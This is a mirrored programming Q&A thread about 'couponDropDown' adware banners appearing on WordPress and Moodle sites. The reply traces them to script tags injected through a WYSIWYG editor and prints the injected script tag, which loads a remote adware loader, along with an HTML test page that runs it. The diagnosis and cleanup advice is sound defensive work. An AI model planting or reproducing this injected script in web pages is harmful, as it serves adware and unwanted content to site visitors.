Welcome to OGeek Q&A Community for programmer and developer-Open, Learning and Share
Welcome To Ask or Share your Answers For Others

Categories

0 votes
224 views
in Technique[技术] by (71.8m points)

html - Ad couponDropDown

I've got a problem concerning famous on-site ads malware, specifically Ad couponDropDown.

I'm aware that usually these ads are created via malware on computer, or as browser Add-on. However, my hard drive and my firefox, both are clean, but ads is still shown on particular website that I created a long time ago.

It is inserted between two divs as html tag with random generating class.

Site is running on wordpress with iThemes security (formerly better security) - with latest update and none high-risks issues. As I downloaded and updated plugin the ad itself disappeared, but left blank container and "ads by coupon | close" link.

For now I hid center tag via css.

I appreciate any response.

Link to site (it's in slovenian): http://www.grasshopper.si/

See Question&Answers more detail:os

与恶龙缠斗过久,自身亦成为恶龙;凝视深渊过久,深渊将回以凝视…
Welcome To Ask or Share your Answers For Others

1 Reply

0 votes
by (71.8m points)

I had the same problem. Suddenly, a site I manage was full of banners from "couponDropDown". My problem was not about a local virus in my computer too.

Here is what i found, and how I solved it:

  • As I mentioned before, I manage a Moodle site where other users managed courses.
  • In two courses, managed by the same person, the couponDropDown nightmare appeared. But not in others. The problem was restricted to a certain courses from a certain person.
  • Obviously, it was content loaded by that person, but it was not obvious where it was.
  • After looking for a while, in the WYSIWYG editor, looking at the HTML source, some scripts tags having the following structure were found:

    <p>Some HTML over here</p><script src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=10368"></script>
  • All over the course, that script was found. This caused some iframes to be created, and some content from http://advertising-support.com/ to be loaded.

  • Finally, I just thought that the computer of the person managing those two courses was infected AND (here is the important thing) introducing that code in the editor without being noticed, and loading that script in the site. Those scripts finally loaded tons of banners and the like. Really smart.
  • SOLUTION: went all over those two courses content looking for the script loading from akamaihd.net.

I guess you may have had the same issue. Maybe you are using a WYSIWYG editor in your backend and that script is attached to the rest of the content without you noticing it.

You may analize your database looking for that script (and as of November 5 2014, it is still there :)

If you are curious, just C&P this code in a html file and load with your local server. With a developer tool, just surf the newly HTML introduced. You will se some iframes, objects loading falsh, some net traffic, and the like but no actual content is showed:

<!DOCTYPE html>
<html>
<head>
    <meta charset="utf8">
    <title>couponDropDown test</title>
</head>
<body>
<p>Some HTML over here</p>
<script src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=10368"></script>
</body>

与恶龙缠斗过久,自身亦成为恶龙;凝视深渊过久,深渊将回以凝视…
OGeek|极客中国-欢迎来到极客的世界,一个免费开放的程序员编程交流平台!开放,进步,分享!让技术改变生活,让极客改变未来! Welcome to OGeek Q&A Community for programmer and developer-Open, Learning and Share
Click Here to Ask a Question

...